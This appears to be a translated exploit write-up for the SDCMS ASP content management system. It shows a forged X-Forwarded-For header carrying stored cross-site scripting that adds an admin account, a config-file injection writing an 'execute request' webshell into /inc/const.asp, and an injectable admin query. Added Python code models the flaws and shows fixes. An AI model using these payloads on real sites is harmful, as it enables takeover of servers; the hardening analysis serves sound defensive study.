SDCMS: the website information management system of the times. SDCMS is a website information management system based on ASP + ACCESS/MSSQL, permanently free and open source. SDCMS takes information as its theme, starting from text and image headlines, and supports unlimited topic categories; through the flexible use of multiple plug-ins, SDCMS realizes the vision of an information portal.
SDCMS summarizes the current state of information portals and fully considers the requirements of webmasters; a flexible tag-call method is designed to meet needs at different levels.
Following the principle of security first, SDCMS addresses the common vulnerabilities of ASP programs (server-side problems excepted). The program itself has no backdoors, and strict code filtering provides a reliable guarantee for the secure operation of the site.
The above is how the SDCMS site describes its own product, and its polished interface and flexible plug-ins do bear that out. On the security side, sensitive characters are filtered out as anti-injection protection, which does offer some protection.
Its security, appearance and extensibility make it a popular choice for many site builders; a Google search for the footer string "power by sdcms" turns up plenty of installations.
But even a wise man nods: as a rule, the most common and most easily overlooked code is where the problems turn up. (The official site is http://www.sdcms.cn, where the source code can be downloaded.)
Let's look at the following code. (Note: this route only works when the administrator allows comments, but administrators generally do.) In /plug/comment.asp:
Sub save_comment
    ......
    username = sdcms_f.HTMLEncode(username)
    content  = sdcms_f.contentEncode(content)
    ip       = sdcms_f.getip                        ' note: the client IP is fetched here
    Set rs = Server.CreateObject("adodb.recordset")
    sql = "select username, content, ip, infoid, ispass from sd_comment"
    rs.Open sql, conn, 1, 3
    rs.AddNew
    rs(0) = Left(username, 10)
    rs(1) = content
    rs(2) = ip                                      ' no filtering: written straight to the database
    rs(3) = id
    If sdcms_comment_ispass = 1 Then
        msg_contents = ", please wait for review"
        rs(4) = 0
    Else
        rs(4) = 1
    End If
    rs.Update
    ......
End Sub
Now look at the implementation of getip, in /inc/function.asp:
Public Function getip
    ip = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
    If ip = "" Then ip = Request.ServerVariables("REMOTE_ADDR")
    getip = ip
End Function
The problem is obvious. The author takes the IP value from the "HTTP_X_FORWARDED_FOR" server variable, which is nothing more than the X-Forwarded-For request header, and that header is set by whoever sends the request, so it can be forged freely in the packet.
We can forge the request and set "HTTP_X_FORWARDED_FOR" to a one-line ASP trojan, and it is inserted straight into the database as the comment's IP. If we knew where the database lived and it had an .asp extension, we could request it and execute the payload directly.
Unfortunately the database name is not known: at installation 12 random characters are generated by the code below, and the extension stays .mdb. So although the one-line trojan is now sitting in the database, it cannot be used either.
/install/index.asp
Function get_something
    Randomize
    Do While Len(pass) < 12                        ' number of random characters
        num1 = CStr(Chr((57 - 48) * Rnd + 48))     ' 0 ~ 9
        num2 = CStr(Chr((90 - 65) * Rnd + 65))     ' A ~ Z
        num3 = CStr(Chr((122 - 97) * Rnd + 97))    ' a ~ z
        pass = pass & num1 & num2 & num3
    Loop
    get_something = pass
End Function
So we take a different route in. Look at the following code in /admin/sdcms_comment.asp:
Sub main
    echo "<form name=""add"" action=""?"" method=""post"" onSubmit=""return confirm('Are you sure you want to perform the selected operation?');"">"
    page = Request.QueryString("page")
    If page = "" Or Not IsNumeric(page) Then
        page = 1
    End If
    pages = 20
    Set rs = Server.CreateObject("adodb.recordset")
    If request("classid") <> 0 Then tj = " where infoid=" & request("classid")
    ' Injection point: classid = sdcms_f.requestint("classid") is taken as an integer above,
    ' but the query is built from the raw request("classid"), which the author never filters,
    ' so it can be injected. It requires administrator rights, though, so we will not pursue it.
    sql = "select id, username,"
    If is_sql = 0 Then
        sql = sql & "(iif(ispass=1, 'reviewed', 'unreviewed'))"
    Else
        sql = sql & "(case ispass when 1 then 'reviewed' else 'unreviewed' end)"
    End If
    sql = sql & ", ip, adddate, content, ispass, infoid from " & sd_table & " " & tj & " order by ispass, id desc"
The author reads the ip column straight out of this query and prints it to the page with the following code, without any filtering:
<td class="title_bg" style="text-align:left"><span style="float:right"><% If rs(6) = 0 Then %><a href="?action=pass&id=<%=rs(0)%>&t=1&classid=<%=classid%>">Approve</a><% Else %><a href="?action=pass&id=<%=rs(0)%>&t=0&classid=<%=classid%>">Revoke approval</a><% End If %> <a href="?action=del&id=<%=rs(0)%>&classid=<%=classid%>"
......
", false);
ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajax.send("t0=test&t1=test&t2=1");
Once the administrator opens the comment list, the script stored in the ip field runs in the administrator's browser and an account is added automatically.
I covered this technique in earlier articles, so I won't go into it again here.
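The two pieces above fit together: getip trusts X-Forwarded-For, save_comment stores it unfiltered, and the admin page echoes it. The Python below is an added example, not SDCMS code. It models that path, then shows the two fixes a practitioner would apply: a getip that honours X-Forwarded-For only when the TCP peer is one of our own reverse proxies and the value parses as an address, and escaping at output time. The server variables, the form fields, the trusted-proxy address 10.0.0.2 and the "ADD_USER_PAGE.asp" target in the payload are constructed for the demo; the page's excerpt does not name the real add-account URL.

```python
import html
import ipaddress


def getip(server_vars):
    """Port of SDCMS getip(): HTTP_X_FORWARDED_FOR wins over REMOTE_ADDR."""
    ip = server_vars.get("HTTP_X_FORWARDED_FOR", "")
    if ip == "":
        ip = server_vars.get("REMOTE_ADDR", "")
    return ip


def getip_hardened(server_vars, trusted_proxies=frozenset()):
    """Use X-Forwarded-For only if the TCP peer is a proxy we run, walk the
    list from the right past our own proxies, and require the chosen hop to
    parse as an IP address. Anything else falls back to REMOTE_ADDR, so no
    attacker-chosen string is ever stored as an IP."""
    remote = server_vars.get("REMOTE_ADDR", "")
    if remote not in trusted_proxies:
        return remote
    hops = [h.strip() for h in server_vars.get("HTTP_X_FORWARDED_FOR", "").split(",")]
    for hop in reversed(hops):
        if hop in trusted_proxies:
            continue
        try:
            return str(ipaddress.ip_address(hop))
        except ValueError:
            break
    return remote


def save_comment(server_vars, form, ip_func=getip):
    """Model of save_comment: username/content are HTML-encoded, the IP is not."""
    return {
        "username": html.escape(form.get("username", ""))[:10],
        "content": html.escape(form.get("content", "")),
        "ip": ip_func(server_vars),
        "infoid": int(form.get("id", 0)),
        "ispass": 0,
    }


def render_admin_row(row):
    """Model of /admin/sdcms_comment.asp: the stored ip is echoed verbatim."""
    return f"<td>{row['username']}</td><td>{row['ip']}</td><td>{row['content']}</td>"


def render_admin_row_hardened(row):
    """Same row with every stored field escaped when it is written to HTML."""
    return "".join(f"<td>{html.escape(str(row[k]))}</td>" for k in ("username", "ip", "content"))


# Constructed attacker request: X-Forwarded-For carries a script that POSTs a
# new account from the administrator's session, using the same form fields the
# article shows (t0=test&t1=test&t2=1). "ADD_USER_PAGE.asp" is a placeholder.
PAYLOAD = ('<script>var a=new XMLHttpRequest();a.open("POST","/admin/ADD_USER_PAGE.asp",false);'
           'a.setRequestHeader("Content-Type","application/x-www-form-urlencoded");'
           'a.send("t0=test&t1=test&t2=1");</script>')
ATTACKER_VARS = {"HTTP_X_FORWARDED_FOR": PAYLOAD, "REMOTE_ADDR": "203.0.113.5"}
FORM = {"username": "guest", "content": "nice site", "id": "7"}

# Constructed legitimate request arriving through our own reverse proxy.
PROXIED_VARS = {"HTTP_X_FORWARDED_FOR": "198.51.100.7, 10.0.0.2", "REMOTE_ADDR": "10.0.0.2"}
TRUSTED = frozenset({"10.0.0.2"})


def demo():
    vuln = save_comment(ATTACKER_VARS, FORM)                          # stores the script
    safe = save_comment(ATTACKER_VARS, FORM, ip_func=getip_hardened)  # stores 203.0.113.5
    return {
        "stored_vuln": vuln["ip"],
        "stored_safe": safe["ip"],
        "html_vuln": render_admin_row(vuln),
        "html_safe": render_admin_row_hardened(vuln),
        "behind_proxy": getip_hardened(PROXIED_VARS, TRUSTED),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

Both fixes are needed: validating the IP at write time keeps the sd_comment.ip column clean, and escaping at output time protects the admin page even if some other field is stored raw.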
Next, getting a shell. Look at the code that writes the site configuration from the admin backend, in /admin/sdcms_set.asp:
Set fso = Server.CreateObject("scripting.filesystemobject")
Set info = fso.CreateTextFile(Server.MapPath("../inc/const.asp"), True)
info.write "<" & "%" & vbcrlf
......
info.write "%" & ">"
info.close
Set info = Nothing
Set fso = Nothing
The author writes the configuration into /inc/const.asp, an ASP file that is executed on every request. The values come from the save routine in the same file:
Sub save
    t0  = clear_bad(Trim(request("t0")))
    t1  = clear_bad(Trim(request("t1")))
    t2  = clear_bad(Trim(request("t2")))
    t3  = clear_bad(Trim(request("t3")))
    t4  = clear_bad(Trim(request("t4")))
    t5  = clear_bad(Trim(request("t5")))
    t6  = clear_bad(Trim(request("t6")))
    t7  = clear_bad(Trim(request("t7")))
    t8  = clear_bad(Trim(request("t8")))
    t9  = clear_bad(Trim(request("t9")))
    t10 = clear_bad(Trim(request("t10")))
    t11 = clear_bad(Trim(request("t11")))
    t12 = clear_bad(Trim(request("t12")))
    t13 = Trim(request("t13"))
    t14 = dir_check(Trim(request("t14")))
    t15 = Trim(request("t15"))
    t16 = Trim(request("t16"))
    t17 = dir_check(Trim(request("t17")))
    If t17 <> "" Then t17 = t17 & "/"
    Select Case t3
        Case ".htm", ".html", ".shtml"
        Case Else: t3 = ".html"
    End Select
    Select Case t13
        Case "0", "1"
        Case Else: t13 = 0
    End Select
    Set sdcms_f = New sdcms_function
    t9 = sdcms_f.check_event(t9, "|"): t10 = sdcms_f.check_event(t10, "|"): t11 = sdcms_f.check_event(t11, "|")
    Set sdcms_f = Nothing
Most of the submitted parameters are passed through clear_bad:
Function clear_bad(t0)
    clear_bad = Replace(t0, """", "")
    clear_bad = Replace(t0, Chr(10), "")
End Function
We can see that t15 and t16 are not filtered at all. (clear_bad itself is also weaker than it looks: the second Replace starts again from the original t0, so the result of stripping the double quotes is overwritten and only line feeds are actually removed. The t15/t16 route is the simpler one, so that is what we use.)
t16 is the file name item in the preference settings.
So we set the file name value to: test"%><%execute request("value")%><%a="test
When that is written into the configuration, the first double quote closes the string literal and %> closes the ASP block, the next <% ... %> is a fresh block containing execute request("value"), and the trailing a="test fragment absorbs the closing quote the writer appends, so the file stays syntactically valid. In this way a one-line trojan is written into /inc/const.asp.
Then use it to upload a full webshell and you're done.
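How the submitted t16 value becomes executable, and what a writer that cannot be broken out of looks like, as an added Python model (not SDCMS code). The setting names sdcms_sitename and sdcms_filename and the one-assignment-per-line layout of the generated file are assumptions, since the page elides the actual info.write lines; the payload is the one from the article. The asp_blocks helper splits text the way the ASP parser does, at every %> regardless of VBScript string context, which is also why the original code emits "<" & "%" rather than a literal <%.

```python
import re


def clear_bad(t0):
    """Port of SDCMS clear_bad(): the second Replace starts again from t0, so
    the quote stripping of the first line is thrown away (kept as-is on purpose)."""
    result = t0.replace('"', "")
    result = t0.replace("\n", "")
    return result


def write_const_asp(values, encode=lambda v: '"' + v + '"'):
    """Model of sdcms_set.asp: one <% %> block with one assignment per setting.
    The default encoder wraps the raw value in quotes, as the article's
    unfiltered t16 path effectively does."""
    lines = ["<" + "%"]
    for name, value in values.items():
        lines.append(f"{name} = {encode(value)}")
    lines.append("%" + ">")
    return "\r\n".join(lines)


def vb_literal(value):
    """Hardened encoder for a VBScript string literal inside an ASP block:
    drop CR/LF (a literal cannot span lines), double embedded quotes, and split
    any '%>' across a concatenation, because ASP ends the block at the first
    '%>' it sees even inside a string literal."""
    value = value.replace("\r", "").replace("\n", "")
    value = value.replace('"', '""')
    value = value.replace("%>", '%" & ">')
    return '"' + value + '"'


ASP_BLOCK = re.compile(r"<%(.*?)%>", re.S)


def asp_blocks(text):
    """Split a page the way the ASP parser does: every <% ... %> span is code."""
    return [m.group(1).strip() for m in ASP_BLOCK.finditer(text)]


# Constructed input: the file-name value the article submits as t16.
PAYLOAD = 'test"%><%execute request("value")%><%a="test'


def demo():
    settings = {"sdcms_sitename": "SDCMS demo", "sdcms_filename": PAYLOAD}
    vuln = write_const_asp(settings)                     # raw value: three ASP blocks
    safe = write_const_asp(settings, encode=vb_literal)  # encoded: still one block
    return {
        "vuln_file": vuln,
        "vuln_blocks": asp_blocks(vuln),
        "safe_file": safe,
        "safe_blocks": asp_blocks(safe),
    }


if __name__ == "__main__":
    out = demo()
    print(out["vuln_file"])
    print("ASP blocks in vulnerable file:", out["vuln_blocks"])
    print(out["safe_file"])
    print("ASP blocks in hardened file:", out["safe_blocks"])
```

In the hardened output the payload survives only as text inside a string literal, so sdcms_filename still holds the attacker's string (which the file-name setting should additionally reject for characters like quotes and angle brackets), but no second <% %> block is created. Writing configuration as executable ASP is the root problem; storing it as data (an INI or the database) removes this class of bug entirely.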